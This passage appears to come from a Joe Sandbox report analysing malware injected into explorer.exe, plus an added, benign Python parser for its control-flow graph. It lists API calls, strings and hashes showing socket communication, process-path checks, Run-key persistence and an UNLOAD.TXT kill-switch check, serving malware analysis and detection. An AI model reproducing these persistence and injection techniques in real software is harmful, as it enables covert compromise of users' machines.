                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E259E7
                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E25A00
                                                                                                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E25A18
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$AddressAllocLibraryLoadProc
                                                                                                            • String ID: NTDLL.DLL$RtlGetVersion
                                                                                                            • API String ID: 2539306102-196638859
                                                                                                            • Opcode ID: 36a3cc2a456c8631fadbe0c98f8f55923dc29c10ce112e1fe93d10f9b6ad3a27
                                                                                                            • Instruction ID: 16841360f78cc5d6b6e650bb3ef699943a64383cee3886e765afdf88e75e6231
                                                                                                            • Opcode Fuzzy Hash: 36a3cc2a456c8631fadbe0c98f8f55923dc29c10ce112e1fe93d10f9b6ad3a27
                                                                                                            • Instruction Fuzzy Hash: 9751F836219A84C6E724CF15F59839A77B0F7D8B88F401526DA8E97768DF3DC944CB00

Control-flow Graph
• Function e09ac0: rendered graph omitted; only the API calls recoverable from the node listing are kept, in address order: a polling loop (e09ac9-e09c3d) of WaitForSingleObject, SHGetKnownFolderPath, LocalAlloc, call e28378 and CreateFileW, which on failure runs CloseHandle / LocalFree / CoTaskMemFree (e09c1c-e09c37) and loops back to the WaitForSingleObject; when CreateFileW succeeds (e09b95), optionally after call e0fba0 (e09ba7), the code runs CloseHandle, LocalFree, CoTaskMemFree and OpenEventW (e09bb1), then SetEvent and CloseHandle (e09bfc), and returns.
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Free$CloseHandleLocal$EventTask$AllocCreateFileFolderKnownObjectOpenPathSingleWait
                                                                                                            • String ID: %s\%s$UNLOAD.TXT${DD700AA6-D197-4A4A-838A-B93EA96F236B}
                                                                                                            • API String ID: 2734627627-3124979191
                                                                                                            • Opcode ID: 10c1d22eb571fe77a4ef00b0e6d2917a271e4e91fa89b4f9c3857c0d8971b072
                                                                                                            • Instruction ID: 5b01ee213a3a04ee500f3a288b8879025aeeef80636184e026fcfc57f3ac8233
                                                                                                            • Opcode Fuzzy Hash: 10c1d22eb571fe77a4ef00b0e6d2917a271e4e91fa89b4f9c3857c0d8971b072
                                                                                                            • Instruction Fuzzy Hash: 7A411F31504AC082E7209F54F95835AB3B0F7D57B4F601B26E6AAA6AF9CF7DC485CB00
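The control_flow_graph entry for the function at e09ac0 is emitted by the sandbox as one flat token list, which makes the loop structure and the order of API calls hard to read. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses that token format, enumerates the API sequence on every simple path from the entry block to the exit block, and reports the loop back-edge. The input string is copied verbatim from the report; the grammar it assumes (a decimal block id followed by a hex address or range, `a->b` edge tokens, `call <addr>` for internal calls, every other token an API label) is inferred from this one entry and is an assumption.

```python
"""Parse a flattened Joe Sandbox control_flow_graph line and recover API call
order along each path. Added example; the grammar is inferred from the report
entry for e09ac0 and is an assumption, not a documented format."""
import re
from collections import defaultdict

# Copied verbatim from the report entry for the function at e09ac0.
CFG_LINE = (
    "control_flow_graph 1081 e09ac0-e09ac5 1082 e09ac9-e09ae0 WaitForSingleObject "
    "1081->1082 1083 e09c42-e09c48 1082->1083 1084 e09ae6-e09aff SHGetKnownFolderPath "
    "1082->1084 1085 e09b05-e09b20 LocalAlloc 1084->1085 1086 e09c3d 1084->1086 "
    "1087 e09c32-e09c37 CoTaskMemFree 1085->1087 1088 e09b26-e09b93 call e28378 "
    "CreateFileW 1085->1088 1086->1082 1087->1086 1091 e09c14-e09c1a 1088->1091 "
    "1092 e09b95-e09b9c 1088->1092 1095 e09c27-e09c2c LocalFree 1091->1095 "
    "1096 e09c1c-e09c21 CloseHandle 1091->1096 1093 e09bb1-e09bfa CloseHandle LocalFree "
    "CoTaskMemFree OpenEventW 1092->1093 1094 e09b9e-e09ba5 1092->1094 1098 e09c12 "
    "1093->1098 1099 e09bfc-e09c0c SetEvent CloseHandle 1093->1099 1094->1091 "
    "1097 e09ba7-e09baf call e0fba0 1094->1097 1095->1087 1096->1095 1097->1091 "
    "1097->1093 1098->1083 1099->1098"
)

ADDR_RE = re.compile(r"^[0-9a-f]+(-[0-9a-f]+)?$")  # "e09c3d" or "e09ac0-e09ac5"
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")            # "1081->1082"


def parse_cfg(line):
    """Return (nodes, edges); nodes maps block id -> {"range": str, "calls": [str]}."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, current = {}, [], None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges.append((edge.group(1), edge.group(2)))
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok                      # new basic block: "<id> <addr-range>"
            nodes[current] = {"range": tokens[i + 1], "calls": []}
            i += 1
        elif tok == "call" and i + 1 < len(tokens):
            nodes[current]["calls"].append("call " + tokens[i + 1])  # internal call
            i += 1
        else:
            nodes[current]["calls"].append(tok)  # imported API name
        i += 1
    return nodes, edges


def api_paths(nodes, edges, entry, exit_):
    """API call sequences along every simple path entry -> exit_ (internal calls dropped)."""
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    results = []

    def walk(node, seen, calls):
        calls = calls + [c for c in nodes[node]["calls"] if not c.startswith("call ")]
        if node == exit_:
            results.append(calls)
            return
        for nxt in succ[node]:
            if nxt not in seen:
                walk(nxt, seen | {nxt}, calls)

    walk(entry, {entry}, [])
    return results


def back_edges(nodes, edges, entry):
    """DFS back edges, i.e. the edges that close a loop (a polling/retry structure)."""
    succ = defaultdict(list)
    for a, b in edges:
        succ[a].append(b)
    state = {n: 0 for n in nodes}  # 0 unvisited, 1 on stack, 2 done
    found = []

    def dfs(n):
        state[n] = 1
        for m in succ[n]:
            if state[m] == 1:
                found.append((n, m))
            elif state[m] == 0:
                dfs(m)
        state[n] = 2

    dfs(entry)
    return found


if __name__ == "__main__":
    nodes, edges = parse_cfg(CFG_LINE)
    print("loop back-edges:", back_edges(nodes, edges, "1081"))
    for path in api_paths(nodes, edges, "1081", "1083"):
        print(" -> ".join(path))
```

Run stand-alone, the script reports a single back-edge 1086->1082 (the loop re-enters the WaitForSingleObject block) and five entry-to-exit sequences. The longest, WaitForSingleObject, SHGetKnownFolderPath, LocalAlloc, CreateFileW, CloseHandle, LocalFree, CoTaskMemFree, OpenEventW, SetEvent, CloseHandle, together with the String IDs of this block (%s\%s, UNLOAD.TXT, {DD700AA6-D197-4A4A-838A-B93EA96F236B}) is consistent with a thread that periodically checks a known folder for a file named UNLOAD.TXT and, once it can be opened, signals a named event and exits; treating it as such is the reader's inference from the graph, not a statement the report itself makes.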
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameWindows_errno_invalid_parameter_noinfolstrcmpi
                                                                                                            • String ID: %s\explorer.exe
                                                                                                            • API String ID: 3179574994-2893622748
                                                                                                            • Opcode ID: 1bfc62fb89f389df5371351b6afc47bdc54bf83d483249f57838a729e97ffc8f
                                                                                                            • Instruction ID: 98b7edbd06f63b31ef03c0c9639dd92d0b14295bc4cf3f9418c714405503d16e
                                                                                                            • Opcode Fuzzy Hash: 1bfc62fb89f389df5371351b6afc47bdc54bf83d483249f57838a729e97ffc8f
                                                                                                            • Instruction Fuzzy Hash: C621E025214A8182E7349F11F99872A6761FBC8B95F041535FA8E677B9CF7CC68DCB00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                                                                                                            • String ID: %s\svchost.exe
                                                                                                            • API String ID: 3414592467-1955667316
                                                                                                            • Opcode ID: 12c6d49865847895082e34bbceefa938f95d4aec89c943a0a90385de397a9df5
                                                                                                            • Instruction ID: 914fadf0504b7118c286a5181722094d96048c3d53ecc37914ec61d4c3dcc509
                                                                                                            • Opcode Fuzzy Hash: 12c6d49865847895082e34bbceefa938f95d4aec89c943a0a90385de397a9df5
                                                                                                            • Instruction Fuzzy Hash: D721E025214A8182E7349F11F95832A67A1FBC8B94F001535FA8E677B9CF3CCA8DCB00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$Alloc$DirectoryFileModuleNameSystem_errno_invalid_parameter_noinfolstrcmpi
                                                                                                            • String ID: %s\cmd.exe
                                                                                                            • API String ID: 3414592467-923833829
                                                                                                            • Opcode ID: 5af63fee73b885e983a171c554cd543ac2bb57c3c5edb473cb41feac39bf807e
                                                                                                            • Instruction ID: f854b7c7659556737845e7664cc960dd496bff86bfd05fc766787175783583c9
                                                                                                            • Opcode Fuzzy Hash: 5af63fee73b885e983a171c554cd543ac2bb57c3c5edb473cb41feac39bf807e
                                                                                                            • Instruction Fuzzy Hash: BD21CD25214A8182E7349F11F95872A6761FBC8B95F041535FA8EA7AB9CF7CC68DCB00
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32 ref: 00E251ED
                                                                                                              • Part of subcall function 00E257B0: CoInitializeEx.COMBASE ref: 00E257DA
                                                                                                              • Part of subcall function 00E257B0: CoCreateGuid.COMBASE ref: 00E257ED
                                                                                                              • Part of subcall function 00E257B0: StringFromGUID2.COMBASE ref: 00E2580B
                                                                                                              • Part of subcall function 00E257B0: wsprintfA.USER32 ref: 00E2582D
                                                                                                              • Part of subcall function 00E257B0: LocalAlloc.KERNEL32 ref: 00E2583D
                                                                                                              • Part of subcall function 00E257B0: und_memcpy.LIBCMTD ref: 00E258B4
                                                                                                              • Part of subcall function 00E257B0: LocalFree.KERNEL32 ref: 00E258C1
                                                                                                              • Part of subcall function 00E257B0: CoUninitialize.COMBASE ref: 00E258C7
                                                                                                            • setsockopt.WS2_32 ref: 00E252EC
                                                                                                            • LocalFree.KERNEL32 ref: 00E25772
                                                                                                              • Part of subcall function 00E24740: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00E2477F
                                                                                                              • Part of subcall function 00E259A0: LocalAlloc.KERNEL32 ref: 00E259B1
                                                                                                              • Part of subcall function 00E259A0: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E259CF
                                                                                                              • Part of subcall function 00E259A0: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00E255BD), ref: 00E259E7
                                                                                                              • Part of subcall function 00E24C90: WSACreateEvent.WS2_32 ref: 00E24D29
                                                                                                            • LocalFree.KERNEL32 ref: 00E25764
                                                                                                              • Part of subcall function 00E24740: WSACreateEvent.WS2_32 ref: 00E247D9
                                                                                                            • CreateEventW.KERNEL32 ref: 00E256E0
                                                                                                            • WSAEventSelect.WS2_32 ref: 00E2570F
                                                                                                            • und_memcpy.LIBCMTD ref: 00E2573F
                                                                                                            • CloseHandle.KERNEL32 ref: 00E25756
                                                                                                            • shutdown.WS2_32 ref: 00E25785
                                                                                                            • closesocket.WS2_32 ref: 00E25793
                                                                                                              • Part of subcall function 00E25BB0: LocalAlloc.KERNEL32 ref: 00E25BC1
                                                                                                              • Part of subcall function 00E25BB0: lstrcpyW.KERNEL32 ref: 00E25C05
                                                                                                              • Part of subcall function 00E25BB0: GetModuleFileNameW.KERNEL32 ref: 00E25C25
                                                                                                              • Part of subcall function 00E25BB0: LocalFree.KERNEL32 ref: 00E25C34
                                                                                                              • Part of subcall function 00E24C90: Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00E24CCF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$Free$CreateEventTimer$Alloc$ChangeConcurrency::details::platform::__Queueund_memcpy$CloseFileFromGuidHandleInitializeLibraryLoadModuleNameSelectStringUninitializeclosesocketlstrcpylstrlensetsockoptshutdownwsprintf
                                                                                                            • String ID: 8
                                                                                                            • API String ID: 1160820747-4194326291
                                                                                                            • Opcode ID: 7744c4e00b3501b588a20af34e49b89a779c10dbf6e343e0beb01c25e0c734aa
                                                                                                            • Instruction ID: 79d79704b3250ba30c26988c4230c6c96b23341ccf88b598589b0ce8812e1e49
                                                                                                            • Opcode Fuzzy Hash: 7744c4e00b3501b588a20af34e49b89a779c10dbf6e343e0beb01c25e0c734aa
                                                                                                            • Instruction Fuzzy Hash: F6D1DF76218BD08AE7709B15F5443DAB7A4F388798F80152AEA8D53B68DF7DC684CF40
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                                                                                                            • String ID: {3423A12F-92CE-4AE6-962F-DE5D526886C1}
                                                                                                            • API String ID: 1237952354-437755030
                                                                                                            • Opcode ID: fca36edf4844be4939544b6fc52ab05d3dda8d3151a5665033656b6385d46372
                                                                                                            • Instruction ID: 4c6f57aad7f051d7163fbf85257d53b6e56feea1ac6a72a8baa26b871eec4403
                                                                                                            • Opcode Fuzzy Hash: fca36edf4844be4939544b6fc52ab05d3dda8d3151a5665033656b6385d46372
                                                                                                            • Instruction Fuzzy Hash: 1C314D31114BC4D6F7208F25F8A879A77B4F394784F605925E58AA3AB4DF7DC188CB00
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                             • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                             • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$ClassWindow$CreateDestroyDispatchErrorHandleLastModuleRegisterTranslateUnregister
                                                                                                            • String ID: {9C8B46D6-3D59-421D-A2D1-8F95C9197AC8}
                                                                                                            • API String ID: 1237952354-1830929042
                                                                                                            • Opcode ID: f849f3a4336449fa9ac388813d7629770bd7ad0e1afa6c6fa8222e9ffe5ab2fa
                                                                                                            • Instruction ID: d11c4de23a7406d8dd82b2e7a4bc542e173944fc82734a4d91ded007bb3d4642
                                                                                                            • Opcode Fuzzy Hash: f849f3a4336449fa9ac388813d7629770bd7ad0e1afa6c6fa8222e9ffe5ab2fa
                                                                                                            • Instruction Fuzzy Hash: 35314A75119BC5C6E7208F10F95879E77B0F7A4784F501A26D68AA3AB4DF3EC588CB00
                                                                                                            APIs
                                                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00E2477F
                                                                                                              • Part of subcall function 00E23370: recv.WS2_32 ref: 00E2339C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Timer$ChangeConcurrency::details::platform::__Queuerecv
                                                                                                            • String ID:
                                                                                                            • API String ID: 2709879575-0
                                                                                                            • Opcode ID: 002381c08185e5a16537f8a3cffd139b2132a009f6dbad97a70fce292a30c3fc
                                                                                                            • Instruction ID: abbd631c391b567cece35dbd94e67c1a47eda074bba6a03cb62696b0b593d4e9
                                                                                                            • Opcode Fuzzy Hash: 002381c08185e5a16537f8a3cffd139b2132a009f6dbad97a70fce292a30c3fc
                                                                                                            • Instruction Fuzzy Hash: 7EC1E3B26097D4CAE774CB19F0957EAB7A1F3C8748F10511ADA8A97B98CB79C484CF01
                                                                                                            APIs
                                                                                                            • Concurrency::details::platform::__ChangeTimerQueueTimer.LIBCMTD ref: 00E24CCF
                                                                                                              • Part of subcall function 00E233B0: send.WS2_32 ref: 00E233DC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Timer$ChangeConcurrency::details::platform::__Queuesend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1596855159-0
                                                                                                            • Opcode ID: a14449d47bcc732b4026f4a8e1815cb31c5e400aa0fa59b0bbadee9f018b8fd0
                                                                                                            • Instruction ID: 500b9f71e6a9e56fa0b3ff880486b3bf436b8342aaf4e555c6e557f34efc8f67
                                                                                                            • Opcode Fuzzy Hash: a14449d47bcc732b4026f4a8e1815cb31c5e400aa0fa59b0bbadee9f018b8fd0
                                                                                                            • Instruction Fuzzy Hash: 3DC1E372609BD0CAD770CB19F5847EAB7A1F7C8748F10911ADA8A97B98CB79C494CF01
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32 ref: 00E0909E
                                                                                                            • GetWindowsDirectoryW.KERNEL32 ref: 00E090D7
                                                                                                            • GetSystemDirectoryW.KERNEL32 ref: 00E09110
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • StrCmpIW.SHLWAPI ref: 00E091E8
                                                                                                            • StrCmpIW.SHLWAPI ref: 00E091FF
                                                                                                            • StrCmpIW.SHLWAPI ref: 00E09216
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FileModuleNameSystemWindows_errno_invalid_parameter_noinfo
                                                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe
                                                                                                            • API String ID: 4125122012-2596767422
                                                                                                            • Opcode ID: c456c09313bfc01ec283db73f2b66220511faa922ff89db487c5000120ef8833
                                                                                                            • Instruction ID: dc8b7ce728c7f3aaad763f60797fa76bcf7071db3ccdc80b74e8f5269988c076
                                                                                                            • Opcode Fuzzy Hash: c456c09313bfc01ec283db73f2b66220511faa922ff89db487c5000120ef8833
                                                                                                            • Instruction Fuzzy Hash: C5410F21314AC4A6D770DB34F9943DB63A2F788744F805536868DD3AA9EF3DC658CB44
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Run, xrefs: 00E0F3C5
                                                                                                            • {AB1F3E47-AEF1-400E-A108-233A046C3A34}, xrefs: 00E0F3DD
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00E0F382
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
